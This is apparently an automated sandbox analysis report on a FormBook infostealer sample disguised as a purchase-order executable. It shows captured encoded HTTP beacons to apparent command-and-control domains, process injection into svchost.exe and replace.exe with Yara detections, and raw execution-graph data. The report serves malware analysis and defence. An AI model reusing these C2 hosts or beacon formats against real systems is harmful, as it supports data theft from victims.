                                                                Timestamp: Sep 22, 2024 17:44:57.789427042 CEST  Bytes transferred: 710  Direction: OUT  Data:
                                                                POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 5a 2f 7a 56 37 59 7a 4f 57 72 38 6b 6a 7a 73 6e 41 62 63 64 51 4d 50 30 4d 38 49 68 61 49 4d 45 6a 35 66 43 46 59 5a 6c 67 39 46 65 7a 6f 42 58 4a 48 6a 47 46 4e 33 47 64 67 7a 34 57 34 6d 43 72 32 6e 2b 4a 53 76 54 47 31 76 33 52 52 53 50 2f 4b 70 44 76 2f 45 2f 52 6a 79 74 71 7a 49 70 79 31 4b 79 42 6d 7a 44 63 31 55 6f 39 64 65 6b 48 67 71 55 7a 50 4d 59 58 56 2b 52 2b 73 73 53 34 54 53 49 78 67 57 74 4b 74 43 51 4b 38 53 37 6c 6e 65 6a 6a 55 65 38 31 72 73 34 4f 63 4c 32 65 4e 33 33 51 61 5a 66 31 58 39 74 54 49 35 71 67 6b 52 64 5a 48 7a 62 51 3d 3d
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993Z/zV7YzOWr8kjzsnAbcdQMP0M8IhaIMEj5fCFYZlg9FezoBXJHjGFN3Gdgz4W4mCr2n+JSvTG1v3RRSP/KpDv/E/RjytqzIpy1KyBmzDc1Uo9dekHgqUzPMYXV+R+ssS4TSIxgWtKtCQK8S7lnejjUe81rs4OcL2eN33QaZf1X9tTI5qgkRdZHzbQ==
                                                                Timestamp: Sep 22, 2024 17:44:58.484381914 CEST  Bytes transferred: 355  Direction: IN  Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:44:58 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session ID: 64  Source IP: 192.168.2.6  Source Port: 49790  Destination IP: 81.2.196.19  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:45:00.338097095 CEST  Bytes transferred: 1723  Direction: OUT  Data:
                                                                POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 38 39 67 37 68 68 57 55 70 56 68 64 32 54 33 65 4d 49 30 32 6a 56 4e 77 38 5a 39 39 33 59 48 7a 56 4f 4d 7a 66 46 7a 38 6c 6a 7a 73 35 51 62 52 64 51 4d 65 30 50 4d 4d 68 61 45 32 45 68 78 66 44 6e 51 5a 30 46 42 46 51 7a 6f 42 49 35 47 6b 5a 56 4e 69 47 64 78 36 34 57 6f 6d 43 72 32 6e 2b 50 2b 76 44 6e 31 76 73 52 52 56 5a 76 4b 6c 4a 50 2b 62 2f 52 37 4d 74 71 6d 31 71 43 56 4b 78 6c 43 7a 42 75 74 55 67 39 64 59 6e 48 67 49 55 7a 54 44 59 58 4a 63 52 2b 5a 35 53 34 58 53 4e 56 73 42 2b 72 42 2f 43 4a 6f 7a 6f 6c 57 30 74 6c 6f 54 79 32 54 58 77 64 64 35 35 36 45 56 2b 6c 43 44 4b 46 47 43 67 43 70 54 6f 41 56 76 62 39 71 4b 46 66 7a 54 6c 72 70 4f 36 34 57 44 31 65 4f 48 32 68 51 51 39 37 30 71 32 6b 64 57 57 47 75 45 42 36 69 73 32 36 54 52 49 6a 59 7a 34 43 56 44 30 35 4b 49 2f 37 6f 77 50 79 2b 64 67 47 62 50 44 4a 61 61 54 72 57 44 49 75 33 45 34 49 7a 33 71 42 58 79 68 30 34 64 57 57 4c 77 48 4d 73 4b 58 42 62 37 6a 78 56 33 2b 39 43 [TRUNCATED]
                                                                Data Ascii: i4fTbV=[TRUNCATED]
                                                                Timestamp: Sep 22, 2024 17:45:01.051942110 CEST  Bytes transferred: 355  Direction: IN  Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:45:00 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                Session ID: 65  Source IP: 192.168.2.6  Source Port: 49791  Destination IP: 81.2.196.19  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:45:02.875157118 CEST  Bytes transferred: 421  Direction: OUT  Data:
                                                                GET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.kovallo.cloud
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Timestamp: Sep 22, 2024 17:45:03.595550060 CEST  Bytes transferred: 691  Direction: IN  Data:
                                                                HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:45:03 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session ID: 66  Source IP: 192.168.2.6  Source Port: 49792  Destination IP: 85.159.66.93  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:45:08.628439903 CEST  Bytes transferred: 707  Direction: OUT  Data:
                                                                POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 42 7a 34 30 55 47 37 53 41 4f 6b 4b 69 4c 78 34 34 36 31 61 4e 71 36 64 6a 62 5a 2b 46 4b 4b 58 57 6e 44 43 4e 6d 46 76 52 63 4d 2b 37 72 50 78 67 51 42 47 48 34 78 58 76 46 33 75 2b 37 2b 33 45 61 55 6b 78 4e 53 49 75 2b 74 6b 69 58 32 4e 4a 64 78 57 76 79 69 72 55 39 45 6e 51 44 53 4e 72 36 47 59 43 45 6d 42 62 47 4f 66 78 4c 4c 45 30 43 39 68 38 44 59 52 65 65 33 68 73 51 39 6c 4a 41 7a 53 77 45 30 4f 68 34 71 5a 38 46 41 45 58 55 46 7a 49 75 4d 6a 68 32 30 2b 46 76 5a 65 2f 39 69 42 62 6c 66 64 37 58 64 6e 6b 6c 55 6c 79 59 70 6e 57 52 33 42 39 39 6d 63 53 41 63 6a
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pBz40UG7SAOkKiLx4461aNq6djbZ+FKKXWnDCNmFvRcM+7rPxgQBGH4xXvF3u+7+3EaUkxNSIu+tkiX2NJdxWvyirU9EnQDSNr6GYCEmBbGOfxLLE0C9h8DYRee3hsQ9lJAzSwE0Oh4qZ8FAEXUFzIuMjh20+FvZe/9iBblfd7XdnklUlyYpnWR3B99mcSAcj


                                                                Session ID: 67  Source IP: 192.168.2.6  Source Port: 49793  Destination IP: 85.159.66.93  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:45:11.173235893 CEST  Bytes transferred: 731  Direction: OUT  Data:
                                                                POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 61 58 59 6a 48 43 4d 6b 74 76 53 63 4d 2b 7a 4c 50 30 6b 51 42 33 48 34 38 71 76 48 6a 75 2b 37 61 33 45 59 4d 6b 78 38 53 4c 75 75 74 71 70 33 32 54 4e 64 78 57 76 79 69 72 55 39 42 76 51 44 4b 4e 72 70 65 59 54 51 36 47 57 6d 4f 63 32 4c 4c 45 77 43 39 74 38 44 59 33 65 61 76 4c 73 53 46 6c 4a 42 44 53 78 52 41 4a 36 6f 71 44 78 6c 42 33 47 31 45 2b 4f 64 68 30 6d 46 51 37 51 6f 68 72 7a 72 6a 62 48 57 66 2b 70 48 39 6c 6b 6e 4d 58 79 34 70 4e 55 52 50 42 76 71 71 37 64 30 35 41 6e 32 36 6a 71 63 77 36 36 37 31 6a 6a 66 4c 71 32 74 4e 59 61 77 3d 3d
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfaXYjHCMktvScM+zLP0kQB3H48qvHju+7a3EYMkx8SLuutqp32TNdxWvyirU9BvQDKNrpeYTQ6GWmOc2LLEwC9t8DY3eavLsSFlJBDSxRAJ6oqDxlB3G1E+Odh0mFQ7QohrzrjbHWf+pH9lknMXy4pNURPBvqq7d05An26jqcw6671jjfLq2tNYaw==


                                                                Session ID: 68  Source IP: 192.168.2.6  Source Port: 49794  Destination IP: 85.159.66.93  Destination Port: 80
                                                                Timestamp: Sep 22, 2024 17:45:13.722671032 CEST  Bytes transferred: 1744  Direction: OUT  Data:
                                                                POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 53 58 59 51 50 43 4e 46 74 76 54 63 4d 2b 39 72 50 31 6b 51 42 71 48 38 5a 68 76 48 2f 55 2b 35 53 33 46 37 45 6b 7a 4f 36 4c 67 75 74 71 6d 58 32 4f 4a 64 77 65 76 32 47 76 55 38 78 76 51 44 4b 4e 72 6f 75 59 54 45 6d 47 46 32 4f 66 78 4c 4c 59 30 43 39 42 38 43 39 43 65 61 6a 78 73 6a 6c 6c 51 69 72 53 7a 6a 6f 4a 6e 34 71 46 2f 46 42 76 47 77 64 2b 4f 64 39 34 6d 45 30 64 51 76 52 72 78 2f 61 79 55 48 72 6b 31 32 73 47 32 56 46 38 39 59 39 59 53 78 33 39 6b 49 76 4e 51 6b 41 70 72 41 4f 48 75 64 70 4b 30 4b 78 35 6f 49 43 70 32 76 73 38 4b 47 57 77 56 33 32 39 2f 64 47 73 53 41 33 63 2f 42 54 2b 4a 70 46 6f 68 4c 45 6a 46 56 4f 77 61 6f 68 6c 36 79 6c 70 37 31 49 6c 64 55 66 6c 6a 50 62 7a 2b 56 51 70 4e 6d 4e 56 4e 63 45 76 62 64 43 30 62 2b 56 4d 7a 6a 49 4d 50 6b 44 4f 58 57 79 46 36 64 41 67 58 62 62 4b 45 64 65 67 4a 5a 52 64 6d 34 5a 7a 37 57 6c [TRUNCATED]
                                                                Data Ascii: i4fTbV=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 [TRUNCATED]


                                                                Target ID:0
                                                                Start time:11:40:37
                                                                Start date:22/09/2024
                                                                Path:C:\Users\user\Desktop\PO2024033194.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\PO2024033194.exe"
                                                                Imagebase:0x400000
                                                                File size:1'415'239 bytes
                                                                MD5 hash:1EEBF0360B466749CD46F9D7971C35CD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:11:40:38
                                                                Start date:22/09/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\PO2024033194.exe"
                                                                Imagebase:0xbf0000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:11:40:41
                                                                Start date:22/09/2024
                                                                Path:C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe"
                                                                Imagebase:0xb70000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:11:40:44
                                                                Start date:22/09/2024
                                                                Path:C:\Windows\SysWOW64\replace.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                Imagebase:0x240000
                                                                File size:18'944 bytes
                                                                MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:11:41:09
                                                                Start date:22/09/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff728280000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:3.2%
                                                                  Dynamic/Decrypted Code Coverage:2%
                                                                  Signature Coverage:5%
                                                                  Total number of Nodes:1905
                                                                  Total number of Limit Nodes:37
                                                                  execution_graph (node and edge data of the interactive Execution Graph widget; not reproduced as text)
426c79 86870->86882 86872 40c315 86871->86872 86873 426c2b 86871->86873 86875 40c321 86872->86875 86881 426c5a 86872->86881 86877 426c4b 86873->86877 86878 426c2e 86873->86878 87574 403ea0 52 API calls __cinit 86874->87574 87575 403ea0 52 API calls __cinit 86875->87575 87577 4534e3 52 API calls 86877->87577 86886 40c2de 86878->86886 87576 4534e3 52 API calls 86878->87576 87578 4534e3 52 API calls 86881->87578 87579 4534e3 52 API calls 86882->87579 86886->86667 86886->86886 86888 401a30 86887->86888 86889 401a17 86887->86889 86890 402160 52 API calls 86888->86890 86891 401a2d 86889->86891 87580 403c30 52 API calls _memmove 86889->87580 86892 401a3d 86890->86892 86891->86671 86892->86671 86895 411523 86894->86895 86896 4114ba 86894->86896 87583 4113a8 58 API calls 3 library calls 86895->87583 86901 40200c 86896->86901 87581 417f77 46 API calls __getptd_noexit 86896->87581 86899 4114c6 87582 417f25 10 API calls wcstoxq 86899->87582 86901->86674 86901->86675 86902->86702 86903->86705 86904->86710 86905->86710 86907 4026f0 52 API calls 86906->86907 86908 401c97 86907->86908 86908->86835 86909->86844 86910->86843 86971 40f6f0 86911->86971 86913 40f77b _strcat moneypunct 86979 40f850 86913->86979 86918 427c2a 87008 414d04 86918->87008 86920 40f7fc 86920->86918 86921 40f804 86920->86921 86995 414a46 86921->86995 86925 40f80e 86925->86849 86930 4528bd 86925->86930 86927 427c59 87014 414fe2 86927->87014 86929 427c79 86931 4150d1 _fseek 81 API calls 86930->86931 86932 452930 86931->86932 87514 452719 86932->87514 86935 452948 86935->86851 86936 414d04 __fread_nolock 61 API calls 86937 452966 86936->86937 86938 414d04 __fread_nolock 61 API calls 86937->86938 86939 452976 86938->86939 86940 414d04 __fread_nolock 61 API calls 86939->86940 86941 45298f 86940->86941 86942 414d04 __fread_nolock 61 API calls 86941->86942 86943 4529aa 86942->86943 86944 4150d1 _fseek 81 API calls 86943->86944 86945 4529c4 86944->86945 86946 4135bb _malloc 46 API calls 86945->86946 86947 4529cf 
86946->86947 86948 4135bb _malloc 46 API calls 86947->86948 86949 4529db 86948->86949 86950 414d04 __fread_nolock 61 API calls 86949->86950 86951 4529ec 86950->86951 86952 44afef GetSystemTimeAsFileTime 86951->86952 86953 452a00 86952->86953 86954 452a36 86953->86954 86955 452a13 86953->86955 86956 452aa5 86954->86956 86957 452a3c 86954->86957 86958 413748 _free 46 API calls 86955->86958 86960 413748 _free 46 API calls 86956->86960 87520 44b1a9 86957->87520 86961 452a1c 86958->86961 86963 452aa3 86960->86963 86964 413748 _free 46 API calls 86961->86964 86962 452a9d 86965 413748 _free 46 API calls 86962->86965 86963->86851 86966 452a25 86964->86966 86965->86963 86966->86851 86968 431e64 86967->86968 86969 431e6a 86967->86969 86970 414a46 __fcloseall 82 API calls 86968->86970 86969->86852 86970->86969 86972 425de2 86971->86972 86973 40f6fc _wcslen 86971->86973 86972->86913 86974 40f710 WideCharToMultiByte 86973->86974 86975 40f756 86974->86975 86976 40f728 86974->86976 86975->86913 86977 4115d7 52 API calls 86976->86977 86978 40f735 WideCharToMultiByte 86977->86978 86978->86913 86981 40f85d __crtGetStringTypeA_stat _strlen 86979->86981 86982 40f7ab 86981->86982 87027 414db8 86981->87027 86983 4149c2 86982->86983 87042 414904 86983->87042 86985 40f7e9 86985->86918 86986 40f5c0 86985->86986 86991 40f5cd _strcat __write_nolock _memmove 86986->86991 86987 414d04 __fread_nolock 61 API calls 86987->86991 86989 425d11 86990 4150d1 _fseek 81 API calls 86989->86990 86992 425d33 86990->86992 86991->86987 86991->86989 86994 40f691 __tzset_nolock 86991->86994 87130 4150d1 86991->87130 86993 414d04 __fread_nolock 61 API calls 86992->86993 86993->86994 86994->86920 86996 414a52 __fcloseall 86995->86996 86997 414a64 86996->86997 86998 414a79 86996->86998 87270 417f77 46 API calls __getptd_noexit 86997->87270 87000 415471 __lock_file 47 API calls 86998->87000 87005 414a74 __fcloseall 86998->87005 87002 414a92 87000->87002 87001 414a69 87271 417f25 10 API calls wcstoxq 87001->87271 
87254 4149d9 87002->87254 87005->86925 87339 414c76 87008->87339 87010 414d1c 87011 44afef 87010->87011 87507 442c5a 87011->87507 87013 44b00d 87013->86927 87015 414fee __fcloseall 87014->87015 87016 414ffa 87015->87016 87017 41500f 87015->87017 87511 417f77 46 API calls __getptd_noexit 87016->87511 87019 415471 __lock_file 47 API calls 87017->87019 87021 415017 87019->87021 87020 414fff 87512 417f25 10 API calls wcstoxq 87020->87512 87023 414e4e __ftell_nolock 51 API calls 87021->87023 87024 415024 87023->87024 87513 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87024->87513 87026 41500a __fcloseall 87026->86929 87028 414dd6 87027->87028 87029 414deb 87027->87029 87038 417f77 46 API calls __getptd_noexit 87028->87038 87029->87028 87031 414df2 87029->87031 87040 41b91b 79 API calls 11 library calls 87031->87040 87033 414ddb 87039 417f25 10 API calls wcstoxq 87033->87039 87034 414e18 87036 414de6 87034->87036 87041 418f98 77 API calls 5 library calls 87034->87041 87036->86981 87038->87033 87039->87036 87040->87034 87041->87036 87045 414910 __fcloseall 87042->87045 87043 414923 87098 417f77 46 API calls __getptd_noexit 87043->87098 87045->87043 87047 414951 87045->87047 87046 414928 87099 417f25 10 API calls wcstoxq 87046->87099 87061 41d4d1 87047->87061 87050 414956 87051 41496a 87050->87051 87052 41495d 87050->87052 87054 414992 87051->87054 87055 414972 87051->87055 87100 417f77 46 API calls __getptd_noexit 87052->87100 87078 41d218 87054->87078 87101 417f77 46 API calls __getptd_noexit 87055->87101 87057 414933 __fcloseall @_EH4_CallFilterFunc@8 87057->86985 87062 41d4dd __fcloseall 87061->87062 87063 4182cb __lock 46 API calls 87062->87063 87075 41d4eb 87063->87075 87064 41d560 87103 41d5fb 87064->87103 87065 41d567 87067 416b04 __malloc_crt 46 API calls 87065->87067 87069 41d56e 87067->87069 87068 41d5f0 __fcloseall 87068->87050 87069->87064 